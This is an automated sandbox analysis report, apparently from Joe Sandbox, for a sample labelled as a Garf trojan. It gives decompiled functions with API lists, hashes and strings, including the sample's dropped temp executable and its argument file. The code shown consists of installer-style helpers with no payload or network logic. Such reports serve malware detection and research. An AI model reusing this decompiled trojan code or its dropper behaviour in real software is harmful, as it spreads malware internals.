                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                              • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 73%
                                                                                              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                              0x00401e4e
                                                                                              0x00401e59
                                                                                              0x00401e5b
                                                                                              0x00401e68
                                                                                              0x00401e7f
                                                                                              0x00401e84
                                                                                              0x00401e91
                                                                                              0x00401e96
                                                                                              0x00401e9a
                                                                                              0x00401ea5
                                                                                              0x00401eac
                                                                                              0x00401ebe
                                                                                              0x00401ec4
                                                                                              0x00401ec9
                                                                                              0x00401ed3
                                                                                              0x00402638
                                                                                              0x0040156d
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                              • ReleaseDC.USER32 ref: 00401E84
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2584051700-0
                                                                                              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                              • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                              • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 59%
                                                                                              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                              0x00401c43
                                                                                              0x00401c45
                                                                                              0x00401c4c
                                                                                              0x00401c4f
                                                                                              0x00401c52
                                                                                              0x00401c5c
                                                                                              0x00401c60
                                                                                              0x00401c63
                                                                                              0x00401c6c
                                                                                              0x00401c6c
                                                                                              0x00401c6f
                                                                                              0x00401c73
                                                                                              0x00401c7c
                                                                                              0x00401c7c
                                                                                              0x00401c7f
                                                                                              0x00401c83
                                                                                              0x00401c85
                                                                                              0x00401cda
                                                                                              0x00401cdc
                                                                                              0x00401ce7
                                                                                              0x00401cf1
                                                                                              0x00401cf4
                                                                                              0x00401cf4
                                                                                              0x00401cfd
                                                                                              0x00000000
                                                                                              0x00401c87
                                                                                              0x00401c8e
                                                                                              0x00401c90
                                                                                              0x00401c93
                                                                                              0x00401c99
                                                                                              0x00401ca0
                                                                                              0x00401ca3
                                                                                              0x00401ccb
                                                                                              0x00401d03
                                                                                              0x00401d03
                                                                                              0x00401ca5
                                                                                              0x00401cb3
                                                                                              0x00401cbb
                                                                                              0x00401cbe
                                                                                              0x00401cbe
                                                                                              0x00401ca3
                                                                                              0x00401d06
                                                                                              0x00401d09
                                                                                              0x00401d0f
                                                                                              0x00402ba4
                                                                                              0x00402ba4
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Timeout
                                                                                              • String ID: !
                                                                                              • API String ID: 1777923405-2657877971
                                                                                              • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                              • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                              • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                              0x00406544
                                                                                              0x00406546
                                                                                              0x0040655b
                                                                                              0x0040655e
                                                                                              0x00406563
                                                                                              0x00406568
                                                                                              0x004065a6
                                                                                              0x004065a6
                                                                                              0x0040656a
                                                                                              0x0040657c
                                                                                              0x00406587
                                                                                              0x0040658d
                                                                                              0x00406598
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406598
                                                                                              0x004065ac

                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,?,?,0040679D,80000002), ref: 0040657C
                                                                                              • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,00422728), ref: 00406587
                                                                                              Strings
                                                                                              • "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m, xrefs: 0040653D
                                                                                              • ('B, xrefs: 0040655B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$('B
                                                                                              • API String ID: 3356406503-625183235
                                                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                              • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                              0x00405f38
                                                                                              0x00405f45
                                                                                              0x00405f46
                                                                                              0x00405f51
                                                                                              0x00405f59
                                                                                              0x00405f59
                                                                                              0x00405f61

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3081826266
                                                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                              0x00405642
                                                                                              0x0040564c
                                                                                              0x00405668
                                                                                              0x0040568a
                                                                                              0x0040568d
                                                                                              0x00405693
                                                                                              0x0040569d
                                                                                              0x0040569e
                                                                                              0x004056a0
                                                                                              0x004056a6
                                                                                              0x004056a6
                                                                                              0x004056b0
                                                                                              0x00000000
                                                                                              0x004056be
                                                                                              0x00405675
                                                                                              0x004056ad
                                                                                              0x004056ad
                                                                                              0x00000000
                                                                                              0x004056ad
                                                                                              0x00405681
                                                                                              0x00405683
                                                                                              0x00000000
                                                                                              0x00405683
                                                                                              0x00405652
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405659
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                              • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 77%
                                                                                              			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                              0x00405f84
                                                                                              0x00405f8e
                                                                                              0x00405f91
                                                                                              0x00405f97
                                                                                              0x00405f98
                                                                                              0x00405f99
                                                                                              0x00405fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405fa1
                                                                                              0x00405fa3
                                                                                              0x00405fab

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 00405F89
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 00405F99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-224404859
                                                                                              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                              0x004060cd
                                                                                              0x004060cf
                                                                                              0x004060d2
                                                                                              0x004060fe
                                                                                              0x004060d7
                                                                                              0x004060e0
                                                                                              0x004060e5
                                                                                              0x004060f0
                                                                                              0x004060f3
                                                                                              0x0040610f
                                                                                              0x004060f5
                                                                                              0x004060fc
                                                                                              0x00000000
                                                                                              0x004060fc
                                                                                              0x00406108
                                                                                              0x0040610c
                                                                                              0x0040610c
                                                                                              0x00406106
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
